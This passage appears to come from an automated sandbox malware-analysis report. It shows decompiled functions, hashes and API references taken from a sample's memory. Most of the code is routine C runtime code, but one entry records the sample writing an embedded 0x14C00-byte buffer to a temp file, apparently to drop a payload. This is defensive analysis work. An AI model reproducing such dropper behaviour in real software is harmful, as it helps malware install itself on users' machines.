						E6D86620C(_t91, 0xfffffffe, _t116, 0x6d877014);
						goto L13;
					}
					goto L14;
				} else {
					_v32 = _t68;
					_v28 = _a12;
					 *((intOrPtr*)(_t91 - 4)) =  &_v32;
					if(_t115 == 0xfffffffe) {
						L14:
						return _v16;
					} else {
						do {
							_t95 = _v12;
							_t75 = _t115 + (_t115 + 2) * 2;
							_t92 =  *((intOrPtr*)(_t95 + _t75 * 4));
							_t76 = _t95 + _t75 * 4;
							_t96 =  *((intOrPtr*)(_t76 + 4));
							_v24 = _t76;
							if( *((intOrPtr*)(_t76 + 4)) == 0) {
								_t97 = _v5;
								goto L7;
							} else {
								_t77 = E6D8661BC(_t96, _t116);
								_t97 = 1;
								_v5 = 1;
								_t126 = _t77;
								if(_t126 < 0) {
									_v16 = 0;
									L13:
									_push(_t116);
									_push(_v12);
									E6D865050(_t115, _t116);
									goto L14;
								} else {
									if(_t126 > 0) {
										_t78 = _a4;
										__eflags =  *_t78 - 0xe06d7363;
										if( *_t78 == 0xe06d7363) {
											__eflags =  *0x6d87044c;
											if(__eflags != 0) {
												_t87 = E6D86EC60(__eflags, 0x6d87044c);
												_t120 = _t120 + 4;
												__eflags = _t87;
												if(_t87 != 0) {
													_t118 =  *0x6d87044c; // 0x6d8651ee
													 *0x6d870168(_a4, 1);
													 *_t118();
													_t116 = _v20;
													_t120 = _t120 + 8;
												}
												_t78 = _a4;
											}
										}
										E6D8661F0(_t78, _a8, _t78);
										_t80 = _a8;
										__eflags =  *((intOrPtr*)(_t80 + 0xc)) - _t115;
										if( *((intOrPtr*)(_t80 + 0xc)) != _t115) {
											E6D86620C(_t80, _t115, _t116, 0x6d877014);
											_t80 = _a8;
										}
										_push(_t116);
										_push(_v12);
										 *((intOrPtr*)(_t80 + 0xc)) = _t92;
										E6D865050(_t115, _t116);
										E6D8661D4();
										asm("int3");
										E6D864EC0(0x6d8755e8, 8);
										_t83 = _a4;
										__eflags = _t83;
										if(_t83 != 0) {
											__eflags =  *_t83 - 0xe06d7363;
											if( *_t83 == 0xe06d7363) {
												__eflags =  *((intOrPtr*)(_t83 + 0x10)) - 3;
												if( *((intOrPtr*)(_t83 + 0x10)) == 3) {
													__eflags =  *((intOrPtr*)(_t83 + 0x14)) - 0x19930520;
													if( *((intOrPtr*)(_t83 + 0x14)) == 0x19930520) {
														L28:
														_t103 =  *(_t83 + 0x1c);
														__eflags = _t103;
														if(_t103 != 0) {
															_t112 =  *(_t103 + 4);
															__eflags = _t112;
															if(_t112 == 0) {
																__eflags =  *_t103 & 0x00000010;
																if(( *_t103 & 0x00000010) != 0) {
																	_t83 =  *(_t83 + 0x18);
																	_t104 =  *_t83;
																	__eflags = _t104;
																	if(_t104 != 0) {
																		 *0x6d870168(_t104);
																		_t83 =  *((intOrPtr*)( *((intOrPtr*)( *_t104 + 8))))();
																	}
																}
															} else {
																_t54 =  &_v8;
																 *_t54 = _v8 & 0x00000000;
																__eflags =  *_t54;
																_t83 = E6D86528F( *(_t83 + 0x18), _t112);
																_v8 = 0xfffffffe;
															}
														}
													} else {
														__eflags =  *((intOrPtr*)(_t83 + 0x14)) - 0x19930521;
														if( *((intOrPtr*)(_t83 + 0x14)) == 0x19930521) {
															goto L28;
														} else {
															__eflags =  *((intOrPtr*)(_t83 + 0x14)) - 0x19930522;
															if( *((intOrPtr*)(_t83 + 0x14)) == 0x19930522) {
																goto L28;
															}
														}
													}
												}
											}
										}
										 *[fs:0x0] = _v20;
										return _t83;
									} else {
										goto L7;
									}
								}
							}
							goto L36;
							L7:
							_t115 = _t92;
						} while (_t92 != 0xfffffffe);
						if(_t97 != 0) {
							goto L13;
						}
						goto L14;
					}
				}
				L36:
			}

0x6d865097
0x6d86509c
0x6d8650a2
0x6d8650ae
0x6d8650b0
0x6d8650b6
0x6d8650b6
0x6d8650b9
0x6d8650bf
0x6d8650c0
0x6d8650c1
0x6d8650c4
0x6d8650c7
0x6d8650cf
0x6d8650d4
0x6d8650d7
0x6d8650da
0x6d8650e1
0x6d86513d
0x6d865140
0x6d86514f
0x00000000
0x6d86514f
0x00000000
0x6d8650e3
0x6d8650e3
0x6d8650e9
0x6d8650ef
0x6d8650f5
0x6d865160
0x6d865169
0x6d8650f7
0x6d8650f7
0x6d8650f7
0x6d8650fd
0x6d865100
0x6d865103
0x6d865106
0x6d865109
0x6d86510e
0x6d865124
0x00000000
0x6d865110
0x6d865112
0x6d865117
0x6d865119
0x6d86511c
0x6d86511e
0x6d865134
0x6d865154
0x6d865154
0x6d865155
0x6d865158
0x00000000
0x6d865120
0x6d865120
0x6d86516a
0x6d86516d
0x6d865173
0x6d865175
0x6d86517c
0x6d865183
0x6d865188
0x6d86518b
0x6d86518d
0x6d86518f
0x6d86519c
0x6d8651a2
0x6d8651a4
0x6d8651a7
0x6d8651a7
0x6d8651aa
0x6d8651aa
0x6d86517c
0x6d8651b2
0x6d8651b7
0x6d8651ba
0x6d8651bd
0x6d8651c9
0x6d8651ce
0x6d8651ce
0x6d8651d1
0x6d8651d2
0x6d8651d5
0x6d8651d8
0x6d8651e8
0x6d8651ed
0x6d8651f5
0x6d8651fa
0x6d8651fd
0x6d8651ff
0x6d865201
0x6d865207
0x6d865209
0x6d86520d
0x6d86520f
0x6d865216
0x6d86522a
0x6d86522a
0x6d86522d
0x6d86522f
0x6d865231
0x6d865234
0x6d865236
0x6d865261
0x6d865264
0x6d865266
0x6d865269
0x6d86526b
0x6d86526d
0x6d865277
0x6d86527d
0x6d86527d
0x6d86526d
0x6d865238
0x6d865238
0x6d865238
0x6d865238
0x6d865240
0x6d865245
0x6d865245
0x6d865236
0x6d865218
0x6d865218
0x6d86521f
0x00000000
0x6d865221
0x6d865221
0x6d865228
0x00000000
0x00000000
0x6d865228
0x6d86521f
0x6d865216
0x6d86520d
0x6d865207
0x6d865282
0x6d86528e
0x6d865122
0x00000000
0x6d865122
0x6d865120
0x6d86511e
0x00000000
0x6d865127
0x6d865127
0x6d865129
0x6d865130
0x00000000
0x6d865132
0x00000000
0x6d865130
0x6d8650f5
0x00000000

APIs

_ValidateLocalCookies.LIBCMT ref: 6D8650C7
___except_validate_context_record.LIBVCRUNTIME ref: 6D8650CF
_ValidateLocalCookies.LIBCMT ref: 6D865158
__IsNonwritableInCurrentImage.LIBCMT ref: 6D865183
_ValidateLocalCookies.LIBCMT ref: 6D8651D8

Strings

csm, xrefs: 6D86516D
csm, xrefs: 6D865201

Memory Dump Source

Source File: 00000002.00000002.463521562.000000006D861000.00000020.00020000.sdmp, Offset: 6D860000, based on PE: true

Associated: 00000002.00000002.463511963.000000006D860000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.463537998.000000006D870000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.463547042.000000006D877000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.463553944.000000006D8BF000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.463561012.000000006D8C2000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.463569843.000000006D8C5000.00000002.00020000.sdmp Download File

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm$csm
API String ID: 1170836740-3733052814
Opcode ID: 4be62918fffcc03d789097040e74f25d6d5777a5ed78f3465869a8eb41b6c3e7
Instruction ID: 4cb769d8553c85f432794e76f97707043a613b1fe59b45871c451135b29a340e
Opcode Fuzzy Hash: 4be62918fffcc03d789097040e74f25d6d5777a5ed78f3465869a8eb41b6c3e7
Instruction Fuzzy Hash: 48517D34A04389DFCF11CF68C848A7E7BB5AF45328F1589D9E9155B352D731D901CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0303ACE2, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77COMMON

Download Yara Rule

Strings

ext-ms-, xrefs: 0303AD4D
api-ms-, xrefs: 0303AD39

Memory Dump Source

Source File: 00000002.00000002.462716320.0000000003030000.00000040.00000001.sdmp, Offset: 03030000, based on PE: false

Similarity

API ID:
String ID: api-ms-$ext-ms-
API String ID: 0-537541572
Opcode ID: 5c6350fc6b30338cae45998d7f041e5c3a9930011e9560f83503dae8af00d0d9
Instruction ID: 6baafbb6c3c4b844cb55a8238a0ed847383e09eacb4ad374cae33200e4f0af31
Opcode Fuzzy Hash: 5c6350fc6b30338cae45998d7f041e5c3a9930011e9560f83503dae8af00d0d9
Instruction Fuzzy Hash: 60212775B43224ABDB72DA259D44B3F77AC9F036A1F190520EC97AB290EB30DD00C6E0

Uniqueness

Uniqueness Score: -1.00%

Function 6D86994C, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6D86994C(void* __ecx, signed int* _a4, intOrPtr _a8) {
				signed int* _v8;
				void** _t12;
				void* _t16;
				void* _t18;
				signed int _t22;
				WCHAR* _t23;
				void** _t26;
				signed int* _t29;
				void* _t32;
				void* _t34;

				_t29 = _a4;
				while(_t29 != _a8) {
					_t22 =  *_t29;
					_t12 = 0x6d8c1738 + _t22 * 4;
					_t32 =  *_t12;
					_v8 = _t12;
					if(_t32 == 0) {
						_t23 =  *(0x6d8711f8 + _t22 * 4);
						_t32 = LoadLibraryExW(_t23, 0, 0x800);
						if(_t32 != 0) {
							L12:
							_t26 = _v8;
							 *_t26 = _t32;
							if( *_t26 != 0) {
								FreeLibrary(_t32);
							}
							L14:
							if(_t32 != 0) {
								_t16 = _t32;
								L18:
								return _t16;
							}
							L15:
							_t29 =  &(_t29[1]);
							continue;
						}
						_t18 = GetLastError();
						if(_t18 != 0x57) {
							L9:
							_t32 = 0;
							L10:
							if(_t32 != 0) {
								goto L12;
							}
							 *_v8 = _t18 | 0xffffffff;
							goto L15;
						}
						_t18 = E6D867C88(_t23, L"api-ms-", 7);
						_t34 = _t34 + 0xc;
						if(_t18 == 0) {
							goto L9;
						}
						_t18 = E6D867C88(_t23, L"ext-ms-", 7);
						_t34 = _t34 + 0xc;
						if(_t18 == 0) {
							goto L9;
						}
						_t18 = LoadLibraryExW(_t23, _t32, _t32);
						_t32 = _t18;
						goto L10;
					}
					if(_t32 == 0xffffffff) {
						goto L15;
					}
					goto L14;
				}
				_t16 = 0;
				goto L18;
			}

0x6d869955
0x6d8699ff
0x6d86995d
0x6d86995f
0x6d869966
0x6d869968
0x6d86996e
0x6d86997b
0x6d869990
0x6d869994
0x6d8699e6
0x6d8699e6
0x6d8699eb
0x6d8699ef
0x6d8699f2
0x6d8699f2
0x6d8699f8
0x6d8699fa
0x6d869a0f
0x6d869a0a
0x6d869a0e
0x6d869a0e
0x6d8699fc
0x6d8699fc
0x00000000
0x6d8699fc
0x6d869996
0x6d86999f
0x6d8699d6
0x6d8699d6
0x6d8699d8
0x6d8699da
0x00000000
0x00000000
0x6d8699e2
0x00000000
0x6d8699e2
0x6d8699a9
0x6d8699ae
0x6d8699b3
0x00000000
0x00000000
0x6d8699bd
0x6d8699c2
0x6d8699c7
0x00000000
0x00000000
0x6d8699cc
0x6d8699d2
0x00000000
0x6d8699d2
0x6d869973
0x00000000
0x00000000
0x00000000
0x6d869979
0x6d869a08
0x00000000

Strings

ext-ms-, xrefs: 6D8699B7
api-ms-, xrefs: 6D8699A3

Memory Dump Source

Source File: 00000002.00000002.463521562.000000006D861000.00000020.00020000.sdmp, Offset: 6D860000, based on PE: true

Associated: 00000002.00000002.463511963.000000006D860000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.463537998.000000006D870000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.463547042.000000006D877000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.463553944.000000006D8BF000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.463561012.000000006D8C2000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.463569843.000000006D8C5000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: api-ms-$ext-ms-
API String ID: 0-537541572
Opcode ID: c940b7fa3d3a29b22614cc826e3451cb9d2198e90f941b465358c002440c3391
Instruction ID: ba1c5277f61b55e51ff8f353d5b1d0afc692e2236a372983368950bb6d102bd8
Opcode Fuzzy Hash: c940b7fa3d3a29b22614cc826e3451cb9d2198e90f941b465358c002440c3391
Instruction Fuzzy Hash: 3B21C972A056A5ABDB116B2A8C8CB7E76786B077B4F114A11F915A72C9D730D900C5F0

Uniqueness

Uniqueness Score: -1.00%

Function 0306DA3E, Relevance: 10.6, APIs: 7, Instructions: 65COMMON

Download Yara Rule

APIs

Part of subcall function 0306DA06: _free.LIBCMT ref: 0306DA2B

_free.LIBCMT ref: 0306DA8C
_free.LIBCMT ref: 0306DA97
_free.LIBCMT ref: 0306DAA2
_free.LIBCMT ref: 0306DAF6
_free.LIBCMT ref: 0306DB01
_free.LIBCMT ref: 0306DB0C
_free.LIBCMT ref: 0306DB17

Memory Dump Source

Source File: 00000002.00000002.462716320.0000000003030000.00000040.00000001.sdmp, Offset: 03030000, based on PE: false

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 4020c6471791a799dba88b857dc9e25aa379d10d3b2acc77d9841091bede0fd0
Instruction ID: ab07e6002a58525ef57c473b47f0237abc9a7c75ebd6a27898945b523a4f925a
Opcode Fuzzy Hash: 4020c6471791a799dba88b857dc9e25aa379d10d3b2acc77d9841091bede0fd0
Instruction Fuzzy Hash: 3711B175A0BB44EBD630FBB0CC05FCB77DD6F80308F444814A299AE198DB75B48486C0

Uniqueness

Uniqueness Score: -1.00%

Function 03055623, Relevance: 10.6, APIs: 7, Instructions: 65COMMON

Download Yara Rule

APIs

Part of subcall function 030555EB: _free.LIBCMT ref: 03055610

_free.LIBCMT ref: 03055671
_free.LIBCMT ref: 0305567C
_free.LIBCMT ref: 03055687
_free.LIBCMT ref: 030556DB
_free.LIBCMT ref: 030556E6
_free.LIBCMT ref: 030556F1
_free.LIBCMT ref: 030556FC

Memory Dump Source

Source File: 00000002.00000002.462716320.0000000003030000.00000040.00000001.sdmp, Offset: 03030000, based on PE: false

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 77548614c448977e3f0dc8040cb94d355d909ba76b153c7c383a0f1432c05188
Instruction ID: 87351b427ce6a08ee842e7406bd5db39d7446d691db6a4fd0d699e97fdc74cf2
Opcode Fuzzy Hash: 77548614c448977e3f0dc8040cb94d355d909ba76b153c7c383a0f1432c05188
Instruction Fuzzy Hash: 93116379542B08BAD921FBB1CC06FCB779D6F85721F800819BA9B6E090DA75F6084750

Uniqueness

Uniqueness Score: -1.00%

Function 0303BCA3, Relevance: 10.6, APIs: 7, Instructions: 65COMMON

Download Yara Rule

APIs

Part of subcall function 0303BC6B: _free.LIBCMT ref: 0303BC90

_free.LIBCMT ref: 0303BCF1

Part of subcall function 03037F3F: HeapFree.KERNEL32(00000000,00000000,?,0303727A), ref: 03037F55
Part of subcall function 03037F3F: GetLastError.KERNEL32(?,?,0303727A), ref: 03037F67

_free.LIBCMT ref: 0303BCFC
_free.LIBCMT ref: 0303BD07
_free.LIBCMT ref: 0303BD5B
_free.LIBCMT ref: 0303BD66
_free.LIBCMT ref: 0303BD71
_free.LIBCMT ref: 0303BD7C

Memory Dump Source

Source File: 00000002.00000002.462716320.0000000003030000.00000040.00000001.sdmp, Offset: 03030000, based on PE: false

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: acd949e2a0a43d2e5cf92accafdd33b3a4568e9dd05bb30a302921c11883146f
Instruction ID: 2eccb0ec4caf196f698d118670e1e82f7eb81cd4291de9e8a0d29d1fc15da6dc
Opcode Fuzzy Hash: acd949e2a0a43d2e5cf92accafdd33b3a4568e9dd05bb30a302921c11883146f
Instruction Fuzzy Hash: CE115179552B04EAE530F7B0CC46FDB77DC6F8A704F840815B2A9AF1A0DA75B5044694

Uniqueness

Uniqueness Score: -1.00%

Function 6D86CA10, Relevance: 10.6, APIs: 7, Instructions: 65
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6D86CA10(intOrPtr _a4) {
				void* _t18;

				_t45 = _a4;
				if(_a4 != 0) {
					E6D86C9D8(_t45, 7);
					E6D86C9D8(_t45 + 0x1c, 7);
					E6D86C9D8(_t45 + 0x38, 0xc);
					E6D86C9D8(_t45 + 0x68, 0xc);
					E6D86C9D8(_t45 + 0x98, 2);
					E6D867CC2( *((intOrPtr*)(_t45 + 0xa0)));
					E6D867CC2( *((intOrPtr*)(_t45 + 0xa4)));
					E6D867CC2( *((intOrPtr*)(_t45 + 0xa8)));
					E6D86C9D8(_t45 + 0xb4, 7);
					E6D86C9D8(_t45 + 0xd0, 7);
					E6D86C9D8(_t45 + 0xec, 0xc);
					E6D86C9D8(_t45 + 0x11c, 0xc);
					E6D86C9D8(_t45 + 0x14c, 2);
					E6D867CC2( *((intOrPtr*)(_t45 + 0x154)));
					E6D867CC2( *((intOrPtr*)(_t45 + 0x158)));
					E6D867CC2( *((intOrPtr*)(_t45 + 0x15c)));
					return E6D867CC2( *((intOrPtr*)(_t45 + 0x160)));
				}
				return _t18;
			}

0x6d86ca16
0x6d86ca1b
0x6d86ca24
0x6d86ca2f
0x6d86ca3a
0x6d86ca45
0x6d86ca53
0x6d86ca5e
0x6d86ca69
0x6d86ca74
0x6d86ca82
0x6d86ca90
0x6d86caa1
0x6d86caaf
0x6d86cabd
0x6d86cac8
0x6d86cad3
0x6d86cade
0x00000000
0x6d86caee
0x6d86caf3

APIs

Part of subcall function 6D86C9D8: _free.LIBCMT ref: 6D86C9FD

_free.LIBCMT ref: 6D86CA5E

Part of subcall function 6D867CC2: HeapFree.KERNEL32(00000000,00000000,?,6D86CA02,?,00000000,?,00000000,?,6D86CA29,?,00000007,?,?,6D86ABCC,?), ref: 6D867CD8
Part of subcall function 6D867CC2: GetLastError.KERNEL32(?,?,6D86CA02,?,00000000,?,00000000,?,6D86CA29,?,00000007,?,?,6D86ABCC,?,?), ref: 6D867CEA

_free.LIBCMT ref: 6D86CA69
_free.LIBCMT ref: 6D86CA74
_free.LIBCMT ref: 6D86CAC8
_free.LIBCMT ref: 6D86CAD3
_free.LIBCMT ref: 6D86CADE
_free.LIBCMT ref: 6D86CAE9

Memory Dump Source

Source File: 00000002.00000002.463521562.000000006D861000.00000020.00020000.sdmp, Offset: 6D860000, based on PE: true

Associated: 00000002.00000002.463511963.000000006D860000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.463537998.000000006D870000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.463547042.000000006D877000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.463553944.000000006D8BF000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.463561012.000000006D8C2000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.463569843.000000006D8C5000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 0bb9ebdd5050065bbde736e0c122234aa590cc1f5c44d25b86159968600ef490
Instruction ID: e7ad08f0ff7a377f9113eed3002fdc8473325497d13117c610d60819264d736f
Opcode Fuzzy Hash: 0bb9ebdd5050065bbde736e0c122234aa590cc1f5c44d25b86159968600ef490
Instruction Fuzzy Hash: 51119D71A88B84BADB20EBB4CC09FDB7B9C6F00324F415C16A399B6157CF24B40147A0

Uniqueness

Uniqueness Score: -1.00%

Function 03031604, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 39fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(C:\Users\user\AppData\Local\Temp\edgDDEA.tmp,C0000000,00000001,00000000,00000002,00000080,00000000), ref: 03031621
GetLastError.KERNEL32 ref: 03031631
WriteFile.KERNEL32(00000000,0304CDA0,00014C00,?,00000000), ref: 0303164B
GetLastError.KERNEL32 ref: 03031655
CloseHandle.KERNEL32(00000000), ref: 0303165E

Strings

C:\Users\user\AppData\Local\Temp\edgDDEA.tmp, xrefs: 0303161C

Memory Dump Source

Source File: 00000002.00000002.462716320.0000000003030000.00000040.00000001.sdmp, Offset: 03030000, based on PE: false

Similarity

API ID: ErrorFileLast$CloseCreateHandleWrite
String ID: C:\Users\user\AppData\Local\Temp\edgDDEA.tmp
API String ID: 4031202350-980432519
Opcode ID: b9bdd22968e2ab02684740b0383526993cdc12d81787e6cc87890f2929f5d831
Instruction ID: 6ba20ad8bc874d56e8f0c95fa25b2d873f3300a413a13e13d0578be2f49ce7c0
Opcode Fuzzy Hash: b9bdd22968e2ab02684740b0383526993cdc12d81787e6cc87890f2929f5d831
Instruction Fuzzy Hash: D6F0B4B6243220BBD720A6B6AE0EFAF79ACDB46AB4F050210F905E3181D7705A0086A1

Uniqueness

Uniqueness Score: -1.00%

Function 6D86BB23, Relevance: 9.3, APIs: 6, Instructions: 318
fileCOMMON

Download Yara Rule

C-Code - Quality: 66%

			E6D86BB23(void* __ebx, void* __edi, void* __esi, void* __eflags, void* _a4, signed int _a8, long _a12, intOrPtr _a16) {
				signed int _v8;
				char _v16;
				char _v23;
				char _v24;
				void _v32;
				signed int _v33;
				long _v40;
				long _v44;
				char _v47;
				void _v48;
				intOrPtr _v52;
				long _v56;
				char _v60;
				intOrPtr _v68;
				char _v72;
				struct _OVERLAPPED* _v76;
				signed int _v80;
				signed int _v84;
				intOrPtr _v88;
				signed int _v92;
				long _v96;
				long _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				long _v112;
				void* _v116;
				char _v120;
				int _v124;
				intOrPtr _v128;
				struct _OVERLAPPED* _v132;
				struct _OVERLAPPED* _v136;
				struct _OVERLAPPED* _v140;
				struct _OVERLAPPED* _v144;
				void* __ebp;
				signed int _t172;
				signed int _t174;
				int _t178;
				intOrPtr _t183;
				intOrPtr _t186;
				void* _t188;
				void* _t190;
				long _t193;
				void _t198;
				long _t202;
				void* _t206;
				intOrPtr _t212;
				signed char* _t213;
				char _t216;
				signed int _t219;
				char* _t220;
				void* _t222;
				long _t228;
				intOrPtr _t229;
				char _t231;
				long _t235;
				struct _OVERLAPPED* _t243;
				signed int _t246;
				intOrPtr _t249;
				signed int _t252;
				signed int _t253;
				signed int _t255;
				struct _OVERLAPPED* _t256;
				intOrPtr _t258;
				void* _t262;
				long _t263;
				signed char _t264;
				signed int _t265;
				void* _t266;
				void* _t268;
				struct _OVERLAPPED* _t269;
				long _t270;
				signed int _t271;
				long _t275;
				signed int _t278;
				long _t279;
				struct _OVERLAPPED* _t280;
				signed int _t282;
				intOrPtr _t284;
				signed int _t286;
				signed int _t289;
				long _t290;
				long _t291;
				signed int _t292;
				intOrPtr _t293;
				signed int _t294;
				void* _t295;
				void* _t296;

				_t172 =  *0x6d877014; // 0x6a907f72
				_v8 = _t172 ^ _t294;
				_t174 = _a8;
				_t263 = _a12;
				_t282 = (_t174 & 0x0000003f) * 0x38;
				_t246 = _t174 >> 6;
				_v112 = _t263;
				_v84 = _t246;
				_v80 = _t282;
				_t284 = _a16 + _t263;
				_v116 =  *((intOrPtr*)(_t282 +  *((intOrPtr*)(0x6d8c1818 + _t246 * 4)) + 0x18));
				_v104 = _t284;
				_t178 = GetConsoleCP();
				_t243 = 0;
				_v124 = _t178;
				E6D867B60( &_v72, _t263, 0);
				asm("stosd");
				_t249 =  *((intOrPtr*)(_v68 + 8));
				_v128 = _t249;
				asm("stosd");
				asm("stosd");
				_t275 = _v112;
				_v40 = _t275;
				if(_t275 >= _t284) {
					L52:
					__eflags = _v60 - _t243;
				} else {
					_t286 = _v92;
					while(1) {
						_v47 =  *_t275;
						_v76 = _t243;
						_v44 = 1;
						_t186 =  *((intOrPtr*)(0x6d8c1818 + _v84 * 4));
						_v52 = _t186;
						if(_t249 != 0xfde9) {
							goto L23;
						}
						_t265 = _v80;
						_t212 = _t186 + 0x2e + _t265;
						_t256 = _t243;
						_v108 = _t212;
						while( *((intOrPtr*)(_t212 + _t256)) != _t243) {
							_t256 =  &(_t256->Internal);
							if(_t256 < 5) {
								continue;
							}
							break;
						}
						_t213 = _v40;
						_t278 = _v104 - _t213;
						_v44 = _t256;
						if(_t256 <= 0) {
							_t258 =  *((char*)(( *_t213 & 0x000000ff) + 0x6d877760)) + 1;
							_v52 = _t258;
							__eflags = _t258 - _t278;
							if(_t258 > _t278) {
								__eflags = _t278;
								if(_t278 <= 0) {
									goto L44;
								} else {
									_t290 = _v40;
									do {
										_t266 = _t265 + _t243;
										_t216 =  *((intOrPtr*)(_t243 + _t290));
										_t243 =  &(_t243->Internal);
										 *((char*)(_t266 +  *((intOrPtr*)(0x6d8c1818 + _v84 * 4)) + 0x2e)) = _t216;
										_t265 = _v80;
										__eflags = _t243 - _t278;
									} while (_t243 < _t278);
									goto L43;
								}
							} else {
								_t279 = _v40;
								__eflags = _t258 - 4;
								_v144 = _t243;
								_t260 =  &_v144;
								_v140 = _t243;
								_v56 = _t279;
								_t219 = (0 | _t258 == 0x00000004) + 1;
								__eflags = _t219;
								_push( &_v144);
								_v44 = _t219;
								_push(_t219);
								_t220 =  &_v56;
								goto L21;
							}
						} else {
							_t228 =  *((char*)(( *(_t265 + _v52 + 0x2e) & 0x000000ff) + 0x6d877760)) + 1;
							_v56 = _t228;
							_t229 = _t228 - _t256;
							_v52 = _t229;
							if(_t229 > _t278) {
								__eflags = _t278;
								if(_t278 > 0) {
									_t291 = _v40;
									do {
										_t268 = _t265 + _t243 + _t256;
										_t231 =  *((intOrPtr*)(_t243 + _t291));
										_t243 =  &(_t243->Internal);
										 *((char*)(_t268 +  *((intOrPtr*)(0x6d8c1818 + _v84 * 4)) + 0x2e)) = _t231;
										_t256 = _v44;
										_t265 = _v80;
										__eflags = _t243 - _t278;
									} while (_t243 < _t278);
									L43:
									_t286 = _v92;
								}
								L44:
								_t289 = _t286 + _t278;
								__eflags = _t289;
								L45:
								__eflags = _v60;
								_v92 = _t289;
							} else {
								_t269 = _t243;
								if(_t256 > 0) {
									_t293 = _v108;
									do {
										 *((char*)(_t294 + _t269 - 0xc)) =  *((intOrPtr*)(_t293 + _t269));
										_t269 =  &(_t269->Internal);
									} while (_t269 < _t256);
									_t229 = _v52;
								}
								_t279 = _v40;
								if(_t229 > 0) {
									E6D8659E0( &_v16 + _t256, _t279, _v52);
									_t256 = _v44;
									_t295 = _t295 + 0xc;
								}
								if(_t256 > 0) {
									_t270 = _v44;
									_t280 = _t243;
									_t292 = _v80;
									do {
										_t262 = _t292 + _t280;
										_t280 =  &(_t280->Internal);
										 *(_t262 +  *((intOrPtr*)(0x6d8c1818 + _v84 * 4)) + 0x2e) = _t243;
									} while (_t280 < _t270);
									_t279 = _v40;
								}
								_v136 = _t243;
								_v120 =  &_v16;
								_t260 =  &_v136;
								_v132 = _t243;
								_push( &_v136);
								_t235 = (0 | _v56 == 0x00000004) + 1;
								_v44 = _t235;
								_push(_t235);
								_t220 =  &_v120;
								L21:
								_push(_t220);
								_push( &_v76);
								_t222 = E6D86C757(_t260);
								_t296 = _t295 + 0x10;
								if(_t222 == 0xffffffff) {
									goto L52;
								} else {
									_t275 = _t279 + _v52 - 1;
									L31:
									_t275 = _t275 + 1;
									_v40 = _t275;
									_t193 = E6D869796(_v124, _t243,  &_v76, _v44,  &_v32, 5, _t243, _t243);
									_t295 = _t296 + 0x20;
									_v56 = _t193;
									if(_t193 == 0) {
										goto L52;
									} else {
										if(WriteFile(_v116,  &_v32, _t193,  &_v100, _t243) == 0) {
											L51:
											_v96 = GetLastError();
											goto L52;
										} else {
											_t286 = _v88 - _v112 + _t275;
											_v92 = _t286;
											if(_v100 < _v56) {
												goto L52;
											} else {
												if(_v47 != 0xa) {
													L38:
													if(_t275 >= _v104) {
														goto L52;
													} else {
														_t249 = _v128;
														continue;
													}
												} else {
													_t198 = 0xd;
													_v48 = _t198;
													if(WriteFile(_v116,  &_v48, 1,  &_v100, _t243) == 0) {
														goto L51;
													} else {
														if(_v100 < 1) {
															goto L52;
														} else {
															_v88 = _v88 + 1;
															_t286 = _t286 + 1;
															_v92 = _t286;
															goto L38;
														}
													}
												}
											}
										}
									}
								}
							}
						}
						goto L53;
						L23:
						_t252 = _v80;
						_t264 =  *((intOrPtr*)(_t252 + _t186 + 0x2d));
						__eflags = _t264 & 0x00000004;
						if((_t264 & 0x00000004) == 0) {
							_v33 =  *_t275;
							_t188 = E6D86A994(_t264);
							_t253 = _v33 & 0x000000ff;
							__eflags =  *((intOrPtr*)(_t188 + _t253 * 2)) - _t243;
							if( *((intOrPtr*)(_t188 + _t253 * 2)) >= _t243) {
								_push(1);
								_push(_t275);
								goto L30;
							} else {
								_t202 = _t275 + 1;
								_v56 = _t202;
								__eflags = _t202 - _v104;
								if(_t202 >= _v104) {
									_t271 = _v84;
									_t255 = _v80;
									 *((char*)(_t255 +  *((intOrPtr*)(0x6d8c1818 + _t271 * 4)) + 0x2e)) = _v33;
									 *(_t255 +  *((intOrPtr*)(0x6d8c1818 + _t271 * 4)) + 0x2d) =  *(_t255 +  *((intOrPtr*)(0x6d8c1818 + _t271 * 4)) + 0x2d) | 0x00000004;
									_t289 = _t286 + 1;
									goto L45;
								} else {
									_t206 = E6D86A859( &_v76, _t275, 2);
									_t296 = _t295 + 0xc;
									__eflags = _t206 - 0xffffffff;
									if(_t206 == 0xffffffff) {
										goto L52;
									} else {
										_t275 = _v56;
										goto L31;
									}
								}
							}
						} else {
							_v24 =  *((intOrPtr*)(_t252 + _t186 + 0x2e));
							_v23 =  *_t275;
							_push(2);
							 *(_t252 + _v52 + 0x2d) = _t264 & 0x000000fb;
							_push( &_v24);
							L30:
							_push( &_v76);
							_t190 = E6D86A859();
							_t296 = _t295 + 0xc;
							__eflags = _t190 - 0xffffffff;
							if(_t190 == 0xffffffff) {
								goto L52;
							} else {
								goto L31;
							}
						}
						goto L53;
					}
				}
				L53:
				if(__eflags != 0) {
